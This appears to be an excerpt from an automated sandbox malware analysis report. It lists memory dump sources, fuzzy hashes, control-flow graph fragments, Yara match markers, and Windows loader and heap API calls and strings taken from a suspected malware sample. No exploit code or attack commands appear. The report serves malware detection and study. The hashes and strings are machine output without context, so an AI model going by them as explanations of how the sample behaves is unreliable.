                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ccddfa2ced1bdfa6e089c2457b7b672bcc1a0e42521ac636b7740bdbe1a44e23
                                          • Instruction ID: 28d6904ba0b9b3ec64916365916e0cb9d037a6f7fe1971e60c66ddca11fab692
                                          • Opcode Fuzzy Hash: ccddfa2ced1bdfa6e089c2457b7b672bcc1a0e42521ac636b7740bdbe1a44e23
                                          • Instruction Fuzzy Hash: EA516A70D45218CFEB94DFAAD444BEDBBF2FB49310F249029D609A7654C734A946CF41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e26f394b74f29bace62651d3309e5ebf49075ddb4b29ed3baa592169962fb60
                                          • Instruction ID: 3815e474aae0f003c543c6a20127a70f30f5ba34e9cf959c9d4420f406f3ccaf
                                          • Opcode Fuzzy Hash: 5e26f394b74f29bace62651d3309e5ebf49075ddb4b29ed3baa592169962fb60
                                          • Instruction Fuzzy Hash: F9418871E016189BDB08CFABC94059EFBF7AFC8310F14C07AD508AB224EB3459468F54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08c8209fb16ec90d8b7bfc58a2f0743d87cff5a70614173593aba77d0062eba5
                                          • Instruction ID: 47a7c290a8a506732830758ab8a04f7dcffa676b740656a67faedd4ec1a1cc77
                                          • Opcode Fuzzy Hash: 08c8209fb16ec90d8b7bfc58a2f0743d87cff5a70614173593aba77d0062eba5
                                          • Instruction Fuzzy Hash: 4641E370E05218CFEB58CFAAD848BDDBBF2BB89304F14C1AAD509A7254DB745985CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2df52eca962615d50f8f6c194d144b9dc97287f843603858b2f0e82d382b96b
                                          • Instruction ID: 53f5ca593ef2bc99b312cbccfa126690908db3c3e7bb805166dae3941c8d0906
                                          • Opcode Fuzzy Hash: e2df52eca962615d50f8f6c194d144b9dc97287f843603858b2f0e82d382b96b
                                          • Instruction Fuzzy Hash: 66512071D056189BEB6CCF2B8D556DAFAF7AFC9310F14C1F9991CA6264EB700A818F40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a21560cdd902751c2da5709bc446bb6c2adb99a9aea20d25ef2e08b42ef86294
                                          • Instruction ID: 0c19042e819cd791440895c9184f9568513172b0155a344da714e16d62143644
                                          • Opcode Fuzzy Hash: a21560cdd902751c2da5709bc446bb6c2adb99a9aea20d25ef2e08b42ef86294
                                          • Instruction Fuzzy Hash: 8A316B74D05218DFDBA4DF9AD9407EDBBF2FB89301F109069C609A3254EB745985CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d503b14b9a4e587e33e009f82110e8c444bc7ae84c36e97c6d284bfe53f01ab
                                          • Instruction ID: ff42b956f6a5f7a7aaf721173a83ecc4a941dca1cb5d213323a9dc039393c4df
                                          • Opcode Fuzzy Hash: 2d503b14b9a4e587e33e009f82110e8c444bc7ae84c36e97c6d284bfe53f01ab
                                          • Instruction Fuzzy Hash: 1831CFB0E05218CBEB98CFABD9487DDBBF2BB88304F14C16AD509AB254DB744985CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 352d2c0d50f35ccfba5f52f61ed366ed00033ccb085c2688ef5768135eb8a6f6
                                          • Instruction ID: 17517e93dfe8de781c83364fbf424a3b9c4a5834ff631af2ca0c36e111d106c8
                                          • Opcode Fuzzy Hash: 352d2c0d50f35ccfba5f52f61ed366ed00033ccb085c2688ef5768135eb8a6f6
                                          • Instruction Fuzzy Hash: 9941FC70D467588FEB19CF6B8C5478ABFF6AF86200F04C1EAD448AB265DB740A46CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: effbe2ef23ca0bd2278f23b63d66ee7589ecc89a50a83c5e700a9b03757ba31a
                                          • Instruction ID: 753d5ff0a87ba25fd5537a1523dadf8a4a1ecbc9049615463ab731aa08bfce98
                                          • Opcode Fuzzy Hash: effbe2ef23ca0bd2278f23b63d66ee7589ecc89a50a83c5e700a9b03757ba31a
                                          • Instruction Fuzzy Hash: 673175B0D41629CFEB68DF6BC94878AFAF6BF89304F14C1A9C40CA6254DB740A85CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d376c9c07a7143cd3301363e0f6fec7430ffc239496a0c1ded8f07e9164b1a8
                                          • Instruction ID: b582aeb4a3825372127d1cb01431d1d01f44368ac8075e9c484765bf09664a78
                                          • Opcode Fuzzy Hash: 1d376c9c07a7143cd3301363e0f6fec7430ffc239496a0c1ded8f07e9164b1a8
                                          • Instruction Fuzzy Hash: 5431FCB1E456288FEB58DF6BC8446DAFBF7AFC9300F14C0AAD509A6215DB3049858F40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 803cc66dee9130ccd1670b8e70a00a02f651b472fd9a5205c0a7986d3388dddc
                                          • Instruction ID: 000fe7119899cef7c034bce1939f3d2928ba75b60b9818f91a07d33fc0b116fe
                                          • Opcode Fuzzy Hash: 803cc66dee9130ccd1670b8e70a00a02f651b472fd9a5205c0a7986d3388dddc
                                          • Instruction Fuzzy Hash: 1E210EB1E056589BEB58DF6B8C002DAFAF7AFC9300F14C0BAD948AA214DB7009858E51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                          • API String ID: 0-463314800
                                          • Opcode ID: b402712dfc76fc0aea69c1d2ec71a02da13b8aae1c465c9fac8889faa0871c56
                                          • Instruction ID: 3240f6d81d11b7440992eba635ecf7ddc90362da0e87d0eae16cdbaa05a0ebf3
                                          • Opcode Fuzzy Hash: b402712dfc76fc0aea69c1d2ec71a02da13b8aae1c465c9fac8889faa0871c56
                                          • Instruction Fuzzy Hash: E2519371A402058FC758EF69D950BAEBBEBBFC8300F14896CC44997365DF789906C7A1

                                          Execution Graph

                                          Execution Coverage:0.8%
                                          Dynamic/Decrypted Code Coverage:6.1%
                                          Signature Coverage:4%
                                          Total number of Nodes:99
                                          Total number of Limit Nodes:8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 32 417983-41799f 33 4179a7-4179ac 32->33 34 4179a2 call 42f453 32->34 35 4179b2-4179c0 call 42fa53 33->35 36 4179ae-4179b1 33->36 34->33 39 4179d0-4179e1 call 42def3 35->39 40 4179c2-4179cd call 42fcf3 35->40 45 4179e3-4179f5 LdrLoadDll 39->45 46 4179fa-4179fd 39->46 40->39 47 4179f7 45->47 47->46
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                          • Instruction ID: 2272e45357e1b8a5eef0063927663549135e1288739789d900d719aea6b3099d
                                          • Opcode Fuzzy Hash: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                          • Instruction Fuzzy Hash: C00112B5E0020DABDB10DAA5DC42FDEB778AB54308F4081A6E90897240F675EB588795

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 53 42c7a3-42c7dc call 4048f3 call 42da03 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7D7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
                                          • Instruction ID: c068b07e7c5f5f25d136ae17d6bddc0cdf0b8edc256bca3c504a9b7e04cf088e
                                          • Opcode Fuzzy Hash: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
                                          • Instruction Fuzzy Hash: 11E046762042147BE620AA6ADC41F9B776CEFC5714F00842AFA08A7241CA76B91187F8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 67 12e2b60-12e2b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: af671bcbb2bec84f81f5e69facda35edfac6e26bcfae8996cd2a21a8dbef4f66
                                          • Instruction ID: d854cbd88b64d400967c32a13373ecf20a017edcf4d312a0d60838775308858a
                                          • Opcode Fuzzy Hash: af671bcbb2bec84f81f5e69facda35edfac6e26bcfae8996cd2a21a8dbef4f66
                                          • Instruction Fuzzy Hash: 1990026121240003450571584414616C00AD7E1201F55C035E3014590DC625C9A56225

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 69 12e2df0-12e2dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d1e7cdaae5709b96a16d62c9888541b7c2ab683c3a420147df43b7e30e1d4e8e
                                          • Instruction ID: 564b9e923b55c2217a6c61bbe1205c02219ab865aba90b255707bfa866606617
                                          • Opcode Fuzzy Hash: d1e7cdaae5709b96a16d62c9888541b7c2ab683c3a420147df43b7e30e1d4e8e
                                          • Instruction Fuzzy Hash: A790023121140413D511715845047078009D7D1241F95C426A2424558DD756CA66A221

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 68 12e2c70-12e2c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 63bf733f8ac9e5e0d944d3d7709b08a8017a4ce9443961fa0bc72882d7ca6900
                                          • Instruction ID: 2e933515106f96864574be3d2b07d2b4ecb44796ab80b39e3106511f8deb435e
                                          • Opcode Fuzzy Hash: 63bf733f8ac9e5e0d944d3d7709b08a8017a4ce9443961fa0bc72882d7ca6900
                                          • Instruction Fuzzy Hash: 8090023121148802D5107158840474A8005D7D1301F59C425A6424658DC795C9A57221

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 70 12e35c0-12e35cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1adc4b41a7f50b7f9a8f17c0c8db4e518099f13322cba43bf96e3b26690eb377
                                          • Instruction ID: 4902ea48382d392a7f83eda43a51edc9f6d996a62c29c32a7470489e9bdaef28
                                          • Opcode Fuzzy Hash: 1adc4b41a7f50b7f9a8f17c0c8db4e518099f13322cba43bf96e3b26690eb377
                                          • Instruction Fuzzy Hash: DF90023161550402D500715845147069005D7D1201F65C425A2424568DC795CA6566A2

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 42cb23-42cb64 call 4048f3 call 42da03 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CB5F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: 1gA
                                          • API String ID: 3298025750-4052736723
                                          • Opcode ID: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
                                          • Instruction ID: 3db9d38b6c099dfd2cf4dce0f204b55713b22ea5661551a61eb9de621a3d7ce5
                                          • Opcode Fuzzy Hash: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
                                          • Instruction Fuzzy Hash: CFE09276208604BBD610EE99DC45FDB37ADEFC9714F004419FA08A7241D671B91187B4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 48 42cad3-42cb14 call 4048f3 call 42da03 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E73B,?,?,00000000,?,0041E73B,?,?,?), ref: 0042CB0F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
                                          • Instruction ID: 1cc8bddffe364a191cc507c297a67581dd259309c4f7cb3357891730a1f7528c
                                          • Opcode Fuzzy Hash: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
                                          • Instruction Fuzzy Hash: EDE092B6608244BBD610EFA9EC41FDB33ACEFC5714F004419F908A7241CA71B9118BB4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 58 42cb73-42cbaf call 4048f3 call 42da03 ExitProcess
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0

                                          Control-flow Graph

                                          control_flow_graph 63 12e2c0a-12e2c0f 64 12e2c1f-12e2c26 LdrInitializeThunk 63->64 65 12e2c11-12e2c18 63->65
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          Strings
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154E2
                                          • Critical section debug info address, xrefs: 0131541F, 0131552E
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154CE
                                          • Critical section address., xrefs: 01315502
                                          • Address of the debug info found in the active list., xrefs: 013154AE, 013154FA
                                          • corrupted critical section, xrefs: 013154C2
                                          • Thread identifier, xrefs: 0131553A
                                          • 8, xrefs: 013152E3
                                          • Invalid debug info address of this critical section, xrefs: 013154B6
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01315543
                                          • undeleted critical section in freed memory, xrefs: 0131542B
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0131540A, 01315496, 01315519
                                          • Critical section address, xrefs: 01315425, 013154BC, 01315534
                                          • double initialized or corrupted critical section, xrefs: 01315508
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          Strings
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01312409
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0131261F
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01312602
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01312498
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013124C0
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01312624
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01312506
                                          • @, xrefs: 0131259B
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013122E4
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013125EB
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01312412
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          Strings
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01328A3D
                                          • VerifierFlags, xrefs: 01328C50
                                          • AVRF: -*- final list of providers -*- , xrefs: 01328B8F
                                          • VerifierDlls, xrefs: 01328CBD
                                          • VerifierDebug, xrefs: 01328CA5
                                          • HandleTraces, xrefs: 01328C8F
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01328A67
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          Strings
                                          • apphelp.dll, xrefs: 01296496
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012F99ED
                                          • LdrpInitShimEngine, xrefs: 012F99F4, 012F9A07, 012F9A30
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012F9A2A
                                          • minkernel\ntdll\ldrinit.c, xrefs: 012F9A11, 012F9A3A
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012F9A01
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-204845295
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013121BF
                                          • RtlGetAssemblyStorageRoot, xrefs: 01312160, 0131219A, 013121BA
                                          • SXS: %s() passed the empty activation context, xrefs: 01312165
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01312180
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01312178
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0131219F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          Strings
                                          • Loading import redirection DLL: '%wZ', xrefs: 01318170
                                          • LdrpInitializeImportRedirection, xrefs: 01318177, 013181EB
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 013181E5
                                          • minkernel\ntdll\ldrinit.c, xrefs: 012DC6C3
                                          • LdrpInitializeProcess, xrefs: 012DC6C4
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01318181, 013181F5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          APIs
                                            • Part of subcall function 012E2DF0: LdrInitializeThunk.NTDLL ref: 012E2DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D74
